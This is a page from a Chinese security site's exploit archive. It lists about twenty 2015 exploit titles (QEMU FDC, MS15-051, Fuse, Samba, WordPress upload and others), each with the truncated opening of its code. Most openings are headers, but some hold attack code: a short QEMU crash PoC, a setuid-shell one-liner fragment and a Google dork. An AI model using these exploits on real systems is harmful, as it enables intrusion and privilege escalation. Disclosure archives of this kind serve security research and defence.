首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
ESC 8832 Data Controller Multiple Vulnerabilities
  日期:2015-06-01 19:17:45 点击:40 评论:0
=begin # Exploit Title: ESC 8832 Data Controller multiple vulnerabilities # Date: 2014-05-29 # Platform: SCADA / Web Application # Exploit Author: Balazs Makany # Vendor Homepage: www.envirosys.com # Version: ESC 8832 Data Controller Hardware # Teste
Apache Jackrabbit WebDAV XXE Exploit
  日期:2015-05-27 11:13:54 点击:127 评论:0
#!/usr/bin/env python # Exploit Title: Jackrabbit WebDAV XXE # Date: 25-05-2015 # Software Link: http://jackrabbit.apache.org/jcr/ # Exploit Author: Mikhail Egorov # Contact: 0ang3el () gmail com # Website: http://0ang3el.blogspot.com # CVE: CVE-201
FTP Media Server 3.0 - Authentication Bypass and Denial of Service Exploit
  日期:2015-05-27 11:12:29 点击:67 评论:0
#!/usr/bin/env python #================================================================================== # Exploit Title: FTP Media Server 3.0 - Authentication Bypass and Denial of Service # Date: 2015-05-25 # Exploit Author: Wh1t3Rh1n0 (Michael Al
Samba 3.0.37 EnumPrinters 堆内存溢出漏洞
  日期:2015-05-25 15:45:24 点击:112 评论:0
#!/usr/bin/env python #coding:utf-8 # Author:nbsp; niubl -- # Purpose: # Created: 2015/5/20 import sys import impacket from impacket.dcerpc import printer from impacket.dcerpc.v5 import transport,nrpc from impacket.dcerpc.v5.ndr import NDRCALL from
Lenovo System Update Privilege Escalation
  日期:2015-05-25 15:38:05 点击:773 评论:0
### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class Metasploit3 Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::FileDr
Fuse - Local Privilege Escalation Vulnerability
  日期:2015-05-25 15:25:31 点击:59 评论:0
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 a=/tmp/.$$;b=chmod u+sx;echo $b /bin/sh
ZOC SSH Client Buffer Overflow Vulnerability (SEH)
  日期:2015-05-22 16:25:06 点击:44 评论:0
# Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH) # Date: 20-5-2015 # Vendor homepage: www.emtec.com # Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20 (Windows)link=zoc/zoc7030.exeext=html # Author:
OpenLitespeed 1.3.9 - Use After Free (DoS)
  日期:2015-05-22 16:23:39 点击:39 评论:0
/* * Openlitespeed 1.3.9 Use After Free denial of service exploit. * * This exploit triggers a denial of service condition within the Openlitespeed web * server. This is achieved by sending a tampered request contain a large number (91) * of 'a: a'
QEMU - Floppy Disk Controller (FDC) PoC
  日期:2015-05-22 16:22:11 点击:36 评论:0
// Source: https://marc.info/?l=oss-securitym=143155206320935w=2 #include sys/io.h #define FIFO 0x3f5 int main() { int i; iopl(3); outb(0x0a,0x3f5); /* READ ID */ for (i=0;i10000000;i++) outb(0x42,0x3f5); /* push */ }
Phoenix Contact ILC 150 ETH PLC Remote Control Script
  日期:2015-05-22 16:20:48 点击:68 评论:0
#! /usr/bin/env python ''' # Exploit Title: Phoenix Contact ILC 150 ETH PLC Remote Control script # Date: 2015-05-19 # Exploit Author: Photubias - tijl[dot]deneut[at]howest[dot]be # Vendor Homepage: https://www.phoenixcontact.com/online/portal/us?ur
Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052)
  日期:2015-05-22 16:19:02 点击:388 评论:0
// Source: http://www.binvul.com/viewthread.php?tid=508 // Source: https://twitter.com/NTarakanov/status/598370525132423168 #include windows.h #include winternl.h #include stdio.h #pragma comment(lib, ntdll.lib) int main( int argc, CHAR* argv[]) { t
Microsoft Windows - Local Privilege Escalation (MS15-051)
  日期:2015-05-22 16:17:34 点击:125 评论:0
# Source: https://github.com/hfiref0x/CVE-2015-1701 Win32k LPE vulnerability used in APT attack Original info: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html Credits R136a1 / hfiref0x ## Compiled EXE: ### x86 + https:/
ElasticSearch 1.4.5 / 1.5.2 - Path Transversal Vulnerability
  日期:2015-05-22 16:13:11 点击:66 评论:0
#!/usr/bin/python # Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign # Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5 # Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net # Tested on default
Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058)
  日期:2015-05-20 15:49:14 点击:78 评论:0
# Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058)# CVE-2014-4113 Privilege Escalation# http://www.offensive-security.com# Thx to Moritz Jodeit for the beautiful writeup # http://www.exploit-db.com/docs/35152.pdf # Target OS Wind
Internet Explorer 11 - Crash PoC
  日期:2015-05-20 15:32:39 点击:44 评论:0
# Exploit Title: Internet Explorer 11 - Crash PoC# Google Dork: N/A# Date: 19th May, 2015# Exploit Author: garage4hackers# Vendor Homepage: http://garage4hackers.com/showthread.php?t=6246# Software Link: N/A# Version: Tested on IE 11# Tested on: Win
BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass) Exploit
  日期:2015-05-20 15:27:39 点击:26 评论:0
#-----------------------------------------------------------------------------# # Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) # # Date: Feb 15 2015 # # Exploit Author: Gabor Seljan # # Software Link: http://www.bpftp.com/ # #
BisonWare FTP Server 3.5 Buffer Overflow
  日期:2015-05-15 10:23:50 点击:32 评论:0
#!/usr/bin/python# Exploit Title: BisonWare FTP Server Version 3.5 Egg Hunting Exploits# Date: 22 April,2015# Exploit Author: Bikash Dash# www.vulnerableghost.com# Version: BisonWare FTP Server Version 3.5# Tested on: Windows XP service pack3# CVE :
iFTP 2.21 Buffer OverFlow Crash PoC
  日期:2015-05-15 10:22:29 点击:20 评论:0
#!/usr/bin/python ########################################################################################### #Exploit Title:iFTP 2.21 Buffer OverFlow Crash PoC #Author: dogo h@ck #Date Discovered : 12-5-2015 #Vendor Homepage: http://www.memecode.co
WordPress N-Media Website Contact Form with File Upload 1.3.4 - File Upload
  日期:2015-05-13 11:43:02 点击:82 评论:0
#!/bin/bash## Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4# Google Dork : inurl:/uploads/contact_files/# Exploit Author : Claudio Viviani# Vulnerability discovered by : Claudio Viviani# Script Written by : F17.c0de#
SixApart MovableType Storable Perl Code Execution
  日期:2015-05-12 16:16:34 点击:39 评论:0
### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'class Metasploit3 Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient
共637页/12733条记录 首页 上一页 [143] [144] [145] 146 [147] [148] [149] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved